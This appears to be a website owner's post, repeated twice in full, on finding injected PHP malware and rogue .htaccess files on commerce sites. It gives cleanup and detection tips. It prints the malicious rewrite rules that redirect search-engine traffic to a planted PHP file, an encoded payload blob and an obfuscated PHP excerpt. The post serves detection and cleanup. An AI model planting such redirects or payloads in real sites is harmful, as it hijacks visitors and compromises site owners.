Tweet
Fortunately not in modeeworld, but for three other commerce websites that I have, I found suspicious .php and .htaccess files that were apparently redirecting people from my websites to who knows where.
The .php files were named:
gggxhxim.php
c82555d4_noversion.php
gallery1-3_ver1.php
1a6339b1_indesit.php
6c70584b_indesit.php
8154393e_prevv1.php
b66c36e9_old.php
c4fb62a9_ver1.php
dwsync_backup.php
dwsync_bck_old.php
sltranslate.php
main.php
index_new.php
image-media.php
wp-atomic.php
wp-installit.php
inclusion-b*i*t*c*h.php
"Inclusion-b*i*t*c*h" was the first one I noticed, which was clearly a file that did not belong in my directory - the name gave it right away. There are dwsync.xml files that are legitimate, but the two dwsync php files noted above in my directories were not legitimate.
Their basic M.O. is to upload various malicious php files to different places on your site, and then create a malicious new htaccess file with a redirect that references the malicious phps. Interestingly, and baffingly, their malicious files appear to have been uploaded on the same day, maybe same exact second, as the uploads I did with Dreamweaver to update the sites in the first place.
The solution in this instance was to of course delete all of the malicious php files, but also in this case the .htaccess files too - because this was not a situation where the .htaccess has been altered, but rather created entirely. For the most part, forum directories need .htaccess files (which are sometimes used to modify the URLs to SEO friendly versions) but regular website directories do not, unless something special is going on, such as setting the PhP version for that directory.
The type of code I found in the .htaccess files, was, for example:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ inclusion-b*i*t*c*h.php?$1 [L]
and the type of code I found inside the .php files was, like this:
CJkQCK0wegkCdvJGJoAiZplQCJkgCNsTM9U2ckkSKdBiISVkUF ZURS9FUURFSislUFZlUFN1XkAEIsISaj02bj5CXu9Gb5JWYixX bvNmLcVmZhNWek5WYoxXbvNmLch2YyFWZzJWZ3lXb812bj5CX3 92d8RXZu5CXyVGdyFGajxXbvNmLcRXa1RmbvNGfv9GahlHfoNm chV2c8FGdzlmdhRHbhxXbvNmLcx2bhxXbvNmLct2chxXbvNmLc 52ctxXbvNmLcdmbpJGflx2Zv92ZjICKoNGdh12XnVmcwhCImlW CJkQCK0wOx0TZslmYv1GJpkSXgICVOV0RB9lUFNVVfBFVUhkIb JVRWJVRT9FJABCLik2Ip5WatxXai9Wb8BHZp1GfwF2d8VmbvhG c8VGbpJ2btxHM2MXZpJXZzxHZhBXa8VmbvhGcpxnbhlmYtl3c8 RWavJHZuF2IigCajRXYt91ZlJHcoAiZplQCJkgCNsTM9Q3biRS Kp0FIiQlTFdUQfJVRTV1XQRFVIJyWSVkVSV0UfRCQgwiIpNicl RWawNXdklWYixnclx2dhJ3Y8VncuwFbpFWb8dXZpZXZyBHIiV2 dgUGbn92bnx3bvhWY5xHdvJGfyVGZpB3c8VGbpJ2bN1CdvJWZs d2bvdEfzJXZuRnchBXYpRWZNxXZsd2bvdUL09mQzRWQ8JXZsdX YyNWLhN3Z8VGbn92bnNiIog2Y0FWbfdWZyBHKgYWaJkQCJoQD7 ATPlxWai9WbkkQCJkgCNsDM9U2ckkQCJkgCNsDM9Q3biRSCJkQ CK0QCJkQCK0wOpkSK4JXdjRCKzRnblRnbvN2X0V2ZfVGbpZGQo UGZvNWZk9FN2U2chJGQsICf8xnIoUGZvxGc4VGQ9kiZkBHJsQn blRnbvNmcv9GZkwyatRCLrNWYwRUSkgCdzlGbAlQCJkgCNsXKp gnc1NGJoMHdzlGel9VZslmZAhCImlWCJkgCNsDeyVXNk1GJuIX akNGJ9gnc1NGJJkQCK0welNHbl1XCJoQD9lQCJoQD7QXa4V2Oi 4GXjMyIEV0SS90VjMyIiAyboNWZJkQCJoQD7liIzISP9gHJoAi ZplQCJoQD9lQCJoQD7QXa4VWCJkQCK0wOpQWbjRCKjVGel9Fbs VGazByboNWZJkQCJoQD7IienRnLxAiZy1CItJHI7o3Z05SMgYm e41CIyFGdgsjenRnLxAyTtAienRnL0N3boVDZtRyLjJXYvA3dv AHd192LulWYt9GZk8yL6AHd0hGI0V2Z3ByOoRXYwBXb0RCIkNm I9QWbjRSCJkQCK0QfJkQCJoQD7kCZtNGJoMWZ4V2XsxWZoNHIv h2YllQCJkQCK0wOiQ3cvhWNk1GJuAiZy1CItJHI7gGdhBHctRH JgQ2Yi0DZtNGJJkQCJkgCNsXK
or this:
<?php
$fireplace = 'aH(e)vtS';$expended= 'R';$contesting= '_';$lombard= '_';$lapel = 'i_$Pf';$bandgap= 'i';$ballgown= 'eP"eLgVT'; $exaltation= 'o]Iia"rr'; $joanie= 'i';$jigga= '_]"s[';$humorer = 'gOO^cpT,'; $eadmund='yfgve'; $contemplative ='n';$gillan ='"'; $lusts='Te_';$endomorphism = 'R)_CY"';$anion= '?odQaP='; $appealer='b'; $letti ='ItPQ'; $beard= '"';
$billowed = 'r';$centennial ='i'; $flap = 'J'; $buttress= 'G';$dowager= 'o'; $linemen ='gan)ac';$lacrosse= 'WUAvENo';$lorin='r';$dejectedly='_N(Oel)Se';
$graphing = ')';$depressible = '('; $etcpasswd = 'n'; $lamond= 'Kr)'; $florrie ='c';$inexorably ='O';
$auscultations ='o'; $leeann= 'a';$insistent= ':';$electrocuting = ']';
$hazy = ' s6Eorre';$dialects='f'; $elapsed= 'p$)uieo[';$entreaty='O4M)e'; $besetting = 'd';$expertly='A';$inconsiderate='Ua$plr;e)'; $atrophy= 'r';
$handhold = '`';$bit =']'; $granule= 'e';$bramble= 's'; $happily ='['; $ennoble ='E';$banishing='i_Z((nHa$'; $jug='i';$commercialness ='K';$commemorated= ']tNhG,'; $bufferrer= 'ea";$iX'; $critic= 'T';$cleanup = 'rE[_V'; $indoctrinates = 'e';$karita ='s';$fairy ='sd[md:t';
$euphemism= '$';$fatuous= 'u';$comments= 'p';
etc. etc.
Basically, it is a good idea to scan carefully the files in your website directories every now and then. Look for odd named files, or files that do not belong with the others - for example php files that are placed inside image folders. Take a look at the code inside these suspect files, and if it appears like meaningless jumbled numbers and letters or long strings of unrelated words, chances are these files are malicious. And then look for newly created .htaccess files or look inside legitimate .htaccess files for redirect or other code that references these malicious php files. Once you find one malicious file, note its upload date - you'll usually find that all other malware was uploaded at the exact same date and time.
You may also reference back to the virgin files that make up your websites - that should be on your computer somewhere, and compare the lists of files on your local computer with those that are hosted up in your website directory. You may also want to download these suspect files, first noting exactly where they came from, to a safe folder on your computer, before deleting them off the server. That way, if you inadvertently delete a needed file that upsets the workings of your website or forum, you may re-upload it.
But for the most part, once you start finding these malicious files, you will not have such a problem finding them all, and determining that they are in fact malicious.
The .php files were named:
gggxhxim.php
c82555d4_noversion.php
gallery1-3_ver1.php
1a6339b1_indesit.php
6c70584b_indesit.php
8154393e_prevv1.php
b66c36e9_old.php
c4fb62a9_ver1.php
dwsync_backup.php
dwsync_bck_old.php
sltranslate.php
main.php
index_new.php
image-media.php
wp-atomic.php
wp-installit.php
inclusion-b*i*t*c*h.php
"Inclusion-b*i*t*c*h" was the first one I noticed, which was clearly a file that did not belong in my directory - the name gave it right away. There are dwsync.xml files that are legitimate, but the two dwsync php files noted above in my directories were not legitimate.
Their basic M.O. is to upload various malicious php files to different places on your site, and then create a malicious new htaccess file with a redirect that references the malicious phps. Interestingly, and baffingly, their malicious files appear to have been uploaded on the same day, maybe same exact second, as the uploads I did with Dreamweaver to update the sites in the first place.
The solution in this instance was to of course delete all of the malicious php files, but also in this case the .htaccess files too - because this was not a situation where the .htaccess has been altered, but rather created entirely. For the most part, forum directories need .htaccess files (which are sometimes used to modify the URLs to SEO friendly versions) but regular website directories do not, unless something special is going on, such as setting the PhP version for that directory.
The type of code I found in the .htaccess files, was, for example:
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ inclusion-b*i*t*c*h.php?$1 [L]
and the type of code I found inside the .php files was, like this:
CJkQCK0wegkCdvJGJoAiZplQCJkgCNsTM9U2ckkSKdBiISVkUF ZURS9FUURFSislUFZlUFN1XkAEIsISaj02bj5CXu9Gb5JWYixX bvNmLcVmZhNWek5WYoxXbvNmLch2YyFWZzJWZ3lXb812bj5CX3 92d8RXZu5CXyVGdyFGajxXbvNmLcRXa1RmbvNGfv9GahlHfoNm chV2c8FGdzlmdhRHbhxXbvNmLcx2bhxXbvNmLct2chxXbvNmLc 52ctxXbvNmLcdmbpJGflx2Zv92ZjICKoNGdh12XnVmcwhCImlW CJkQCK0wOx0TZslmYv1GJpkSXgICVOV0RB9lUFNVVfBFVUhkIb JVRWJVRT9FJABCLik2Ip5WatxXai9Wb8BHZp1GfwF2d8VmbvhG c8VGbpJ2btxHM2MXZpJXZzxHZhBXa8VmbvhGcpxnbhlmYtl3c8 RWavJHZuF2IigCajRXYt91ZlJHcoAiZplQCJkgCNsTM9Q3biRS Kp0FIiQlTFdUQfJVRTV1XQRFVIJyWSVkVSV0UfRCQgwiIpNicl RWawNXdklWYixnclx2dhJ3Y8VncuwFbpFWb8dXZpZXZyBHIiV2 dgUGbn92bnx3bvhWY5xHdvJGfyVGZpB3c8VGbpJ2bN1CdvJWZs d2bvdEfzJXZuRnchBXYpRWZNxXZsd2bvdUL09mQzRWQ8JXZsdX YyNWLhN3Z8VGbn92bnNiIog2Y0FWbfdWZyBHKgYWaJkQCJoQD7 ATPlxWai9WbkkQCJkgCNsDM9U2ckkQCJkgCNsDM9Q3biRSCJkQ CK0QCJkQCK0wOpkSK4JXdjRCKzRnblRnbvN2X0V2ZfVGbpZGQo UGZvNWZk9FN2U2chJGQsICf8xnIoUGZvxGc4VGQ9kiZkBHJsQn blRnbvNmcv9GZkwyatRCLrNWYwRUSkgCdzlGbAlQCJkgCNsXKp gnc1NGJoMHdzlGel9VZslmZAhCImlWCJkgCNsDeyVXNk1GJuIX akNGJ9gnc1NGJJkQCK0welNHbl1XCJoQD9lQCJoQD7QXa4V2Oi 4GXjMyIEV0SS90VjMyIiAyboNWZJkQCJoQD7liIzISP9gHJoAi ZplQCJoQD9lQCJoQD7QXa4VWCJkQCK0wOpQWbjRCKjVGel9Fbs VGazByboNWZJkQCJoQD7IienRnLxAiZy1CItJHI7o3Z05SMgYm e41CIyFGdgsjenRnLxAyTtAienRnL0N3boVDZtRyLjJXYvA3dv AHd192LulWYt9GZk8yL6AHd0hGI0V2Z3ByOoRXYwBXb0RCIkNm I9QWbjRSCJkQCK0QfJkQCJoQD7kCZtNGJoMWZ4V2XsxWZoNHIv h2YllQCJkQCK0wOiQ3cvhWNk1GJuAiZy1CItJHI7gGdhBHctRH JgQ2Yi0DZtNGJJkQCJkgCNsXK
or this:
<?php
$fireplace = 'aH(e)vtS';$expended= 'R';$contesting= '_';$lombard= '_';$lapel = 'i_$Pf';$bandgap= 'i';$ballgown= 'eP"eLgVT'; $exaltation= 'o]Iia"rr'; $joanie= 'i';$jigga= '_]"s[';$humorer = 'gOO^cpT,'; $eadmund='yfgve'; $contemplative ='n';$gillan ='"'; $lusts='Te_';$endomorphism = 'R)_CY"';$anion= '?odQaP='; $appealer='b'; $letti ='ItPQ'; $beard= '"';
$billowed = 'r';$centennial ='i'; $flap = 'J'; $buttress= 'G';$dowager= 'o'; $linemen ='gan)ac';$lacrosse= 'WUAvENo';$lorin='r';$dejectedly='_N(Oel)Se';
$graphing = ')';$depressible = '('; $etcpasswd = 'n'; $lamond= 'Kr)'; $florrie ='c';$inexorably ='O';
$auscultations ='o'; $leeann= 'a';$insistent= ':';$electrocuting = ']';
$hazy = ' s6Eorre';$dialects='f'; $elapsed= 'p$)uieo[';$entreaty='O4M)e'; $besetting = 'd';$expertly='A';$inconsiderate='Ua$plr;e)'; $atrophy= 'r';
$handhold = '`';$bit =']'; $granule= 'e';$bramble= 's'; $happily ='['; $ennoble ='E';$banishing='i_Z((nHa$'; $jug='i';$commercialness ='K';$commemorated= ']tNhG,'; $bufferrer= 'ea";$iX'; $critic= 'T';$cleanup = 'rE[_V'; $indoctrinates = 'e';$karita ='s';$fairy ='sd[md:t';
$euphemism= '$';$fatuous= 'u';$comments= 'p';
etc. etc.
Basically, it is a good idea to scan carefully the files in your website directories every now and then. Look for odd named files, or files that do not belong with the others - for example php files that are placed inside image folders. Take a look at the code inside these suspect files, and if it appears like meaningless jumbled numbers and letters or long strings of unrelated words, chances are these files are malicious. And then look for newly created .htaccess files or look inside legitimate .htaccess files for redirect or other code that references these malicious php files. Once you find one malicious file, note its upload date - you'll usually find that all other malware was uploaded at the exact same date and time.
You may also reference back to the virgin files that make up your websites - that should be on your computer somewhere, and compare the lists of files on your local computer with those that are hosted up in your website directory. You may also want to download these suspect files, first noting exactly where they came from, to a safe folder on your computer, before deleting them off the server. That way, if you inadvertently delete a needed file that upsets the workings of your website or forum, you may re-upload it.
But for the most part, once you start finding these malicious files, you will not have such a problem finding them all, and determining that they are in fact malicious.